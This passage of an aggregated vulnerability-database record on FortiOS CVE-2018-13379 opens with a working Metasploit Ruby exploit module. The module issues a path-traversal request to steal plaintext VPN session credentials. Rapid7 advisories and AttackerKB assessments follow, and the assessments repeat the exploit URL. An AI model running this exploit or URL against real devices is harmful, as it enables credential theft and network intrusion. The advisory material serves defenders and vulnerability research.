'SSL VPN FortiOs - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tFortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.\r\n\t\t\t\tThis exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).\r\n\t\t\t\tThis vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ 'lynx (Carlos Vieira)' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'})\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing binary file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ow crap, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\t \t\r\n\t\tend\t\r\n\t\tfileObj.close\t\r\n\tend\r\nend", "sourceHref": "https://www.exploit-db.com/download/47287", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "rapid7blog": [{"lastseen": "2021-03-05T23:34:05", "description": "## FortiOS Path Traversal\n\n\n\nReturning community contributor [mekhalleh](<https://github.com/mekhalleh>) submitted a module targeting a path traversal vulnerability within the SSL VPN web portal in multiple versions of FortiOS. The flaw is leveraged to read the usernames and passwords of currently logged in users which are stored in plaintext on the file system. This vulnerability is identified as [CVE-2018-13379](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog>) and can be reliably exploited remotely, without any authentication. Despite the fact that the vulnerability is several years old, CVE-2018-13379 is still known to be [exploited in the wild](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog>), including in [state-sponsored attacks](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>) targeting U.S. government agencies and infrastructure.\n\n## Additional Module Updates\n\nTwo modules received improvements to their targeting capabilities. The ever-popular exploit for [MS17-010](<https://attackerkb.com/topics/xI1y9OoEgq/cve-2017-0144-ms17-010?referrer=blog>) was updated by [zerosum0x0](<https://github.com/zerosum0x0>) (one of the original authors) with an updated fingerprint for properly targeting Windows Storage Server 2008. This allows the exploit module to be used against affected versions of that Server 2008 variant. Additionally, a KarjaSoft Sami FTP exploit was updated by long-time community contributor [bcoles](<https://github.com/bcoles>) who made a number of improvements to it but notably updated the exploit to only rely on an offset within a DLL that is distributed with the vulnerable software. When memory corruption exploits need the address of a POP, POP, RET instruction (as this one does for the SEH overwrite), they are more reliable when referencing one that is distributed with the software and won\u2019t change, unlike libraries that come with the host operating system and are regularly updated.\n\n## New Modules (1)\n\n * [FortiOS Path Traversal Credential Gatherer](<https://github.com/rapid7/metasploit-framework/pull/14518>) by lynx (Carlos Vieira) and mekhalleh (RAMELLA S\u00e9bastien), which exploits a directory traversal vulnerability (CVE-2018-13379) in the SSL VPN web portal of FortiOS 5.4.6 to 5.4.12, FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 to grab the `/dev/cmdb/sslvpn_websession` file, containing the plaintext list of currently connected usernames and their associated passwords. These credentials can then be saved to the `creds` database for use in future attacks.\n\n## Enhancements and features\n\n * [#14783](<https://github.com/rapid7/metasploit-framework/pull/14783>) from [bcoles](<https://github.com/bcoles>) The KarjaSoft Sami FTP Server v2.0.2 USER Overflow module has been updated with documentation, RuboCop updates, support for the AutoCheck mixin to automatically check if a target is vulnerable, an updated list of authors, as well as improvements to its exploit strategy that allow it to use only one offset within a DLL shipped with the target for exploitation, instead of relying on an Windows OS DLL whose offsets could change as the OS was updated.\n * [#14838](<https://github.com/rapid7/metasploit-framework/pull/14838>) from [zerosum0x0](<https://github.com/zerosum0x0>) The `psexec_ms17_010.rb` library has been updated to support additionally fingerprinting Windows Storage Server 2008 R2 targets as potentially exploitable targets, thereby allowing users to exploit Windows Storage Server 2008 R2 targets vulnerable to MS17-010.\n\n## Bugs Fixed\n\n * [#14816](<https://github.com/rapid7/metasploit-framework/pull/14816>) from [dwelch-r7](<https://github.com/dwelch-r7>) Ensures that the `Faker` library is always available for use within modules when generating fake data for bypassing WAF etc.\n * [#14821](<https://github.com/rapid7/metasploit-framework/pull/14821>) from [space-r7](<https://github.com/space-r7>) The `search` command within Meterpreter has had its logic updated to support searches that start at the root directory, aka `/`. These types of searches were previously not returning any results due to a logic bug within the code, which has now been fixed.\n * [#14840](<https://github.com/rapid7/metasploit-framework/pull/14840>) from [dwelch-r7](<https://github.com/dwelch-r7>) Removes `require rex/ui` statement that prevented execution of `msfrpc`.\n * [#14843](<https://github.com/rapid7/metasploit-framework/pull/14843>) from [dwelch-r7](<https://github.com/dwelch-r7>) With the upgrade to zeitwerk in Metasploit, PseudoShell was not being picked up appropriately, resulting in some modules and tools not being able to load it when needed. A fix has now been applied to make sure that PseudoShell can be appropriately loaded by zeitwerk to prevent missing dependency issues.\n * [#14853](<https://github.com/rapid7/metasploit-framework/pull/14853>) from [adfoster-r7](<https://github.com/adfoster-r7>) Fixes an edge case when upgrading from an older version of Metasploit to Metasploit 6.0.32 when using the Mac Metasploit Omnibus installer directly or indirectly via Brew\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.32...6.0.33](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-25T11%3A27%3A42-06%3A00..2021-03-04T11%3A16%3A38-06%3A00%22>)\n * [Full diff 6.0.32...6.0.33](<https://github.com/rapid7/metasploit-framework/compare/6.0.32...6.0.33>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-05T17:20:43", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2018-13379"], "modified": "2021-03-05T17:20:43", "id": "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "href": "https://blog.rapid7.com/2021/03/05/metasploit-wrap-up-101/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T15:46:10", "description": "\n\n_Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too._\n\nOn October 3, 2022, Fortinet released a software update that indicates then-current versions of their FortiOS (firewall) and FortiProxy (web proxy) software are vulnerable to CVE-2022-40684, a critical vulnerability that allows remote, unauthenticated attackers to bypass authentication and gain access to the administrative interface of these products with only a specially crafted http/s request.\n\nAccording to communications from Fortinet that were shared on [social media](<https://twitter.com/Gi7w0rm/status/1578299492822003712>), Fortinet \u201cis strongly recommending all customers with vulnerable versions to perform an immediate upgrade.\u201d\n\n## Affected products\n\n * FortiOS 7.0.0 to 7.0.6\n * FortiOS 7.2.0 to 7.2.1\n * FortiProxy 7.0.0 to 7.0.6\n * FortiProxy 7.2.0\n * FortiSwitchManager 7.0.0\n * FortiSwitchManager 7.2.0\n\n## Remediation\n\nOn Thursday, October 6, 2022, Fortinet released [version 7.0.7](<https://docs.fortinet.com/document/fortigate/7.0.7/fortios-release-notes/289806/resolved-issues>) and [version 7.2.2](<https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/289806/resolved-issues>), which resolve the vulnerability.\n\nAlong with Fortinet, Rapid7 strongly recommends that organizations who are running an affected version of the software upgrade to 7.07 or 7.2.2 **immediately, on an emergency basis**. These products are edge devices, which are high-value and high-focus targets for attackers looking to gain internal network access. Using prior FortiOS vulnerabilities as in indicator (such as CVE-2018-13379) we expect attackers to focus on CVE-2022-40684 quickly and for quite some time.\n\n**Update:** On October 10, 2022, Fortinet released [advisory FG-IR-22-377](<https://www.fortiguard.com/psirt/FG-IR-22-377>) detailing more about the vulnerability as well as confirming known exploitation.\n\n> Fortinet is aware of an instance where this vulnerability was exploited, and recommends immediately validating your systems against the following indicator of compromise in the device's logs: \n`user=\"Local_Process_Access\"`\n\nFurthermore, Rapid7 recommends that all high-value edge devices limit public access to any administrative interface.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-40684 on FortiOS via an authenticated scan with a content update released on October 7, 2022.\n\n## Updates\n\n10/07/2022 13:30 ET: Updated InsightVM/Nexpose check information. \n10/11/2022 10:40 ET: Updated affected products, exploitation, and vulnerability information from Fortinet's [advisory](<https://www.fortiguard.com/psirt/FG-IR-22-377>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-07T16:24:42", "type": "rapid7blog", "title": "CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2022-40684"], "modified": "2022-10-07T16:24:42", "id": "RAPID7BLOG:4E867F9E4F1818A4F797C0C8A1E26598", "href": "https://blog.rapid7.com/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-04-08T18:54:35", "description": "\n\n_The following blog was co-authored by Caitlin Condon and [Bob Rudis](<https://blog.rapid7.com/author/bob-rudis>), also known (in his own words) as \u201csome caveman from Maine.\u201d_\n\nLast week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI [published a joint alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) to warn users that APT threat actors were likely exploiting unpatched Fortinet FortiOS devices to gain initial access to government, commercial, technology, and other organizations\u2019 networks. The alert highlighted three FortiOS vulnerabilities, all of which were previously known, and at least one of which (CVE-2018-13379) has been broadly exploited for more than 18 months. This week, CISA [published an additional alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) amplifying a threat report from security firm Onapsis, which describes [ongoing attacks against SAP applications](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>).\n\nRapid7 has previously analyzed a number of the highest-severity vulnerabilities enumerated in this latest set of alerts. The CVEs included in these reports have been detailed below, along with recommendations for organizations seeking to defend themselves against ongoing exploitation. Notably, none of these vulnerabilities are new\u2014many of them are a year or more old, which underscores the need for a regular patch cycle, as well as a defined patch cycle exception process.\n\n## FortiOS vulnerabilities\n\nFortinet devices are what we call **network pivots**\u2014that is, the position they occupy in organizations\u2019 networks gives external attackers the ability to access internal networks if exploited successfully, which in turn allows for a range of secondary attacks and other nefarious activities. If at all possible, defenders should strongly consider implementing a \u201czero-day\u201d patch cycle for internet-exposed and other network pivot products, including (but not only) Fortinet and other VPNs. InsightVM and Nexpose customers can assess their exposure to all three FortiOS CVEs below with vulnerability checks.\n\n * CVE-2018-13379 is a pre-authentication information disclosure vulnerability that arises from a path traversal flaw in the web portal component of FortiOS SSL VPNs. The vulnerability allows external attackers to download FortiOS system files through specially crafted HTTP resource requests and has been [exploited in the wild since 2019](<https://us-cert.cisa.gov/ncas/current-activity/2019/10/04/vulnerabilities-exploited-multiple-vpn-applications>). Read our [full analysis of CVE-2018-13379 and its history here](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog#rapid7-analysis>).\n * [CVE-2019-5591](<https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591?referrer=blog>) is a default configuration vulnerability in FortiOS that allows an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n * [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812?referrer=blog>) is an improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below that gives a user the ability to log in successfully without being prompted for the second factor of authentication (FortiToken) if that user changes the case of their username.\n\nSince the beginning of March, Rapid7 Labs' Heisenberg Honeypot fleet has seen nearly 60 IP addresses attempting common, known single `GET` request exploits against Fortinet devices (we\u2019ve grouped the IP addresses up to the hosting provider/ISP level):\n\n\n\nUnfortunately, our fleet does not emulate Fortinet devices. Since these devices are fairly easy to distinguish on the internet (nearly 1 million of them in the image, below)\u2014due to the common, vendor SSL certificate they use\u2014it is surprising to see opportunistic exploit attempts versus just inventory/discovery scans.\n\nOver 1 million Fortinet devices discovered by the latest Project Sonar scans (geolocated with MaxMind)\n\nThat last sentence should help organizations underscore why CISA and the FBI raised the Fortinet exploitation campaign to the level of a joint alert: Attackers can easily identify legitimate Fortinet endpoints on the internet, and it takes virtually no time from discovery to exploit if a target system is not patched and configured properly.\n\nOn April 3, 2021, Fortinet published [a post on patch and vulnerability management](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>) where they outlined their emergency response and patch release practices new alignment to ISO standards and further emphasized the need to keep internet-exposed Fortinet devices patched. They have a special knowledge base article on [how to keep notified about Fortinet patch releases](<https://kb.fortinet.com/kb/microsites/search.do?cmd=displayKC&docType=kc&externalId=FD50697&sliceId=1&docTypeID=DT_KCARTICLE_1_1&dialogID=184200521&stateId=1%200%20184202090%27>) and provide multiple ways for organizations to say current on Fortinet security updates. \n\nAs Fortinet notes in that post, these weaknesses have had patches available for quite some time, so if you\u2019re just getting around to fixing them, you may need to dedicate some further cycles to some forensic activity, as it is very likely one or more attackers have already taken advantage of these vulnerabilities.\n\nTo learn more about other vulnerabilities that functioned as network pivots for attackers, read [Rapid7\u2019s 2020 Vulnerability Intelligence Report](<https://www.rapid7.com/research/report/vulnerability-intelligence-report/>).\n\n## Actively exploited SAP vulnerabilities\n\nThe two most recent SAP vulnerabilities detailed in Onapsis\u2019 threat report are CVE-2020-6287, a CVSS-10 vulnerability in the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard that has been actively exploited in the wild since July 2020, and SAP Solution Manager CVE-2020-6207. Both of these vulnerabilities allow broad compromise of SAP applications and environments.\n\n * CVE-2020-6287 is present by default in SAP applications running on top of SAP NetWeaver AS Java 7.3 and any newer versions (up to SAP NetWeaver 7.5). It allows remote, unauthenticated attackers to exploit and fully compromise vulnerable SAP installations. Exploitation of CVE-2020-6287 through the HTTP interface allows for modification or extraction of highly sensitive information and disruption of critical business processes. For a list of affected applications and additional guidance, read Rapid7\u2019s [full analysis here](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java?referrer=blog#rapid7-analysis>).\n * CVE-2020-6207 arises from a missing authentication check in version 7.2 of SAP\u2019s Solution Manager product, allowing attackers to completely compromise all SMDAgents connected to the Solution Manager. \nSAP customers should pay close attention to their access logs and monitor for unauthorized user account creation; they should also ensure that web services in general do not run using privileged accounts. InsightVM and Nexpose customers can assess their risk to CVE-2020-6287 with a remote vulnerability check. A check for CVE-2020-6207 is currently under development.\n\nOther SAP vulnerabilities noted as being exploited in the wild include:\n\n * CVE-2018-2380 affects SAP CRM versions 7.01, 7.02, 7.30, 7.31, 7.33, and 7.54. The vulnerability allows an attacker to exploit insufficient validation of path information provided by users, letting characters representing &quot;traverse to parent directory&quot; pass through to the file APIs.\n * CVE-2016-9563 is a vulnerability in SAP NetWeaver Application Server (AS) Java 7.5 that allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI.\n * CVE-2016-3976 is a directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 that allows remote attackers to read arbitrary files via a ..\\ (dot dot backslash) in the fileName parameter to `CrashFileDownloadServlet`.\n * CVE-2010-5326 is a CVSS-10 vulnerability in the `Invoker` Servlet on SAP NetWeaver Application Server Java platforms that arises from a lack of authentication and allows remote attackers to execute arbitrary code via an HTTP or HTTPS request. It was used in attacks from 2013 to 2016.\nAttackers have used these vulnerabilities to establish persistence, escalate privileges, and evade detection. It is also possible that threat actors may build exploit chains that extend access beyond SAP applications to underlying operating systems. Further information and recommendations is [available from Onapsis here](<https://www.onapsis.com/active-cyberattacks-mission-critical-sap-applications>). \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-04-08T17:18:07", "type": "rapid7blog", "title": "Attackers Targeting Fortinet Devices and SAP Applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-13379", "CVE-2018-2380", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-08T17:18:07", "id": "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "href": "https://blog.rapid7.com/2021/04/08/attackers-targeting-fortinet-devices-and-sap-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-03-13T02:17:06", "description": "An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 28, 2020 6:12pm UTC reported:\n\nThe advisory isn\u2019t worded very well, but it seems that logging in to the SSL VPN with a different-case username than set will allow 2FA to be bypassed, opening up the VPN to password attacks, such as password spraying.\n\nSuccessful VPN access to an internal network can open up a lot of doors for an attacker, turning an external compromise into an authorized internal one. Many corporate services are hidden behind VPN. That said, proper network segmentation and secondary access controls can mitigate some of the risk. The \u201cattacker value\u201d is \u201cmedium\u201d because this is just a 2FA bypass and also because of the listed caveats. It isn\u2019t terribly useful on its own.\n\nThe [KB article](<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>) is written much better.\n\n**ccondon-r7** at April 05, 2021 2:09pm UTC reported:\n\nThe advisory isn\u2019t worded very well, but it seems that logging in to the SSL VPN with a different-case username than set will allow 2FA to be bypassed, opening up the VPN to password attacks, such as password spraying.\n\nSuccessful VPN access to an internal network can open up a lot of doors for an attacker, turning an external compromise into an authorized internal one. Many corporate services are hidden behind VPN. That said, proper network segmentation and secondary access controls can mitigate some of the risk. The \u201cattacker value\u201d is \u201cmedium\u201d because this is just a 2FA bypass and also because of the listed caveats. It isn\u2019t terribly useful on its own.\n\nThe [KB article](<https://kb.fortinet.com/kb/documentLink.do?externalID=FD37033>) is written much better.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-24T00:00:00", "type": "attackerkb", "title": "CVE-2020-12812", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-12812"], "modified": "2020-07-29T00:00:00", "id": "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "href": "https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-24T20:11:43", "description": "A Default Configuration vulnerability in FortiOS may allow an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at April 05, 2021 2:16pm UTC reported:\n\nOne of three vulnerabilities CISA and the FBI [have warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) are being exploited by APTs to gain initial access to government and other services. The other two vulnerabilities in the alert are [CVE-2018-13379](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=5591>), a pre-authentication path traversal bug that has been actively and widely exploited for years now, and [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812#view-assessment-91b4f49f-9243-4d47-9084-3ef8026411c2>) (an MFA bypass).\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-14T00:00:00", "type": "attackerkb", "title": "CVE-2019-5591", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-5591", "CVE-2020-12812"], "modified": "2021-04-13T00:00:00", "id": "AKB:91756851-9B25-4801-B911-E3226A0656B5", "href": "https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-22T16:50:56", "description": "An Improper Limitation of a Pathname to a Restricted Directory (\u201cPath Traversal\u201d) in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.\n\n \n**Recent assessments:** \n \n**bulw4rk** at March 25, 2020 8:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**gwillcox-r7** at November 04, 2020 4:04pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\n**ccondon-r7** at November 22, 2020 6:52pm UTC reported:\n\n**Description**\n\nDue to a pre-authenticated Path Trasversal vulnerability under the SSL VPN portal on FortiOS, an attacker is able to pull arbitrary system files from the file system. One of the most critical files which an attacker may pull is \u201csslvpn_websessions\u201d which contains session information including usernames and password.\n\nOnce the attacker has obtained the credentials from this file, he can authenticated with those credentials, compromising the corporate perimeter.\n\n**Mitigation**\n\n * Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above. \n\n * Enable 2FA. Note the attacker will not be able to log in to the VPN, but the obtained credentials are still valid (potencial domain creds) to access corporate mail, etc. \n\n\n**Affected Systems**\n\n * FortiOS 6.0: 6.0.0 to 6.0.4 \n\n * FortiOS 5.6: 5.6.3 to 5.6.7 \n\n * FortiOS 5.4: 5.4.6 to 5.4.12 \n\n\nNOTE: Only if the SSL VPN service (web-mode or tunnel-mode) is enabled.\n\n**PoC**\n\nThere are some public working exploits for this vulnerability, targeting the \u201csslvpn_websessions\u201d system file.\n\nAn attacker would access the following URL:\n\n * https://`<IP_ADDRESS>`/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession \n\n\nAnd after some parsing to the binary file, something like the following output would be obtained:\n\n\n\nNOTE: Example image obtained from <https://devco.re/blog/2019/08/09/attacking-ssl-vpn-part-2-breaking-the-Fortigate-ssl-vpn/>\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": 